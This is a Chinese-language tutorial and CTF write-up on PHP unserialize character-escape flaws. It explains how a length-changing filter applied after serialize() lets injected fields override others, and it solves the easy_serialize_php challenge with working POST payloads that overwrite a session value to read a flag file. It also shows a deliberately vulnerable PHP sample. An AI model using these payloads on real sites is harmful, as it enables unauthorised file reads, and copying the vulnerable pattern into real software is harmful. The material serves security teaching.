反序列化的特点
PHP 在反序列化时,底层代码是以 ;
作为字段的分隔,以 }
作为结尾(字符串除外),并且是根据长度判断内容的。
在php中,反序列化的过程中必须严格按照序列化规则才能成功实现反序列化,例如:
<?php $str='a:2:{i:0;s:8:"hahahaha";i:1;s:5:"aaaaa";}'; var_dump(unserialize($str));
输出结果:
array(2) { [0]=> string(8) "hahahaha" [1]=> string(5) "aaaaa" }
一般我们会认为,只要增加或去除$str的任何一个字符都会导致反序列化的失败。
但是事实并非如此,如果我们在$str结尾的花括号后再增加一些字符呢?例如:
<?php $str='a:2:{i:0;s:8:"Hed9eh0g";i:1;s:5:"aaaaa";}abc'; var_dump(unserialize($str));
仍然可以输出上面的结果,这说明反序列化的过程是有一定识别范围的,在这个范围之外的字符都会被忽略,不影响反序列化的正常进行。
举个栗子
字符逃逸:
<?php $_SESSION["user"]='flagflagflagflagflagflag'; $_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}'; $_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn'; echo serialize($_SESSION);
结果为
a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
假设后台存在一个过滤机制,会将含flag字符替换为空,那么以上反序列化字符串的过滤结果为:
a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
那么将这串字符串序列化会得到什么?
这个时候关注第二个s所对应的数字,本来由于有6个flag字符所以为24,现在这6个flag都被过滤了,那么它将会尝试向后读取24个字符看看是否满足序列化的规则,也即读取“;s:8:”function”;s:59:”a,读取这24个字符后以”;结尾,恰好满足规则,而后第三个s向后读取img的20个字符,第四个、第五个s向后读取均满足规则,所以序列化结果为:
array(3) { ["user"]=> string(24) "";s:8:"function";s:59:"a" ["img"]=> string(20) "ZDBnM19mMWFnLnBocA==" ["dd"]=> string(1) "a" }
写成数组形式也即:
$_SESSION["user"]='";s:8:"function";s:59:"a'; $_SESSION["img"]='ZDBnM19mMWFnLnBocA=='; $_SESSION["dd"]='a';
可以发现。SESSION数组的键值img对应的值发生了改变。
设想,如果我们能够你控制原来SESSION数组的function值但是无法控制img的值,我们就可以通过这种方式间接控制到img对应的值。
反序列化字符逃逸
反序列化的字符逃逸问题根据过滤函数一般分为两种。
关键词数增加
这种情况比较好构造,直接构造多个关键词,这样就能逃出几个字符。
还是看个栗子,如果将x替换为yy,如何去修改密码
<?php function filter($string){ return str_replace('x','yy',$string); } $username = "silkage"; $password = "aaaaa"; $user = array($username, $password); var_dump(serialize($user)); echo ' '; $r = filter(serialize($user)); var_dump($r); echo ' '; var_dump(unserialize($r));
假设我们想要把密码修改为123456,如何实现呢?
我们来分析一下:
首先,正常序列化的结果为
a:2:{i:0;s:6:"silkage";i:1;s:5:"aaaaa";}
那如果把username换成silkagexxx,其处理后的序列化结果为。
a:2:{i:0;s:9:"silkageyyyyyy";i:1;s:5:"aaaaa";}
因为比以前多了3个字符,这个时候肯定是序列化失败的
想一下,它在进行修改密码成功之后应该是这样的
a:2:{i:0;s:6:"silkage";i:1;s:6:"123456";}i:1;s:5:"aaaaa";}
可以看到需要添加的字符串为20个字符
";i:1;s:6:"123456";}
silkage为6个字符,因为是x=>yy,字符长度由1=>2,那么我们这里设定填充为z,需要满足
6+z+20 = 6 + 2z ==> z=20 //silkage长度+填充数量+逃逸字符长度 = silkage长度 + 2倍填充长度
所以填充20个x即可。
"a:2:{i:0;s:46:"silkageyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy";i:1;s:6:"123456";}";i:1;s:5:"aaaaa";}" array(2) { [0] => string(46) "silkageyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy" [1] => string(6) "123456" }
关键词数减少
这里以安洵杯easy_serialize_php为例
代码如下
<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } $_SESSION["user"] = 'guest'; $_SESSION['function'] = $function; extract($_POST); if(!$function){ echo '<a href="index.php?f=highlight_file">source_code</a>'; } if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png'); }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); } $serialize_info = filter(serialize($_SESSION)); if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here! }else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); }
flag 在 d0g3_f1ag.php
这个文件中
$_SESSION
数组中有 user, funciton, img
这三个属性
最后读文件的文件名是 $_SESSION['img']
,如果能够控制这个属性就好了,但是
if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png'); }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); }
img的值我们是控制不了的,进而无法读取到目标文件。
但序列化之后经过了一次过滤
而extract($_POST);
使得我们可以控制 $_SESSION
数组中的 user
和 function
那我们就可以构造payload读取文件了。
键逃逸
payload:
_SESSION[phpflag]=;s:7:"xxxxxxx";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
那么经过后端处理就会变成:
"a:2:{ s:7:"";s:48:";s:1:"1"; s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=";}" //结束 ;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
这里为了方便加了换行和注释,实际上是不应该有的。
这的s:7:""之所以为空,是因为故意构造了phpflag这个字符串,经过过滤函数后被替换为空,从而吃掉了一部分值。然后剩下的值充当另一个对象逃逸出去。
值逃逸
payload:
这儿需要两个连续的键值对,由第一个的值覆盖第二个的键,这样第二个值就逃逸出去,单独作为一个键值对
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}&function=show_image
后端处理就会变成:
"a:3{ s:4:"user";s:24:"";s:8:"function";s:59:"a"; s:3:"img";s:20:"ZDBnM19mMWFnLnBocA=="; s:2:"dd";s:1:"a";}" //结束 ;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
同样,也是加了换行和注释。
总结
总之,就是两种方法,第一种通过构造会过滤的值来吃掉字符数量,造成逃逸。第二种就是构造值逃逸。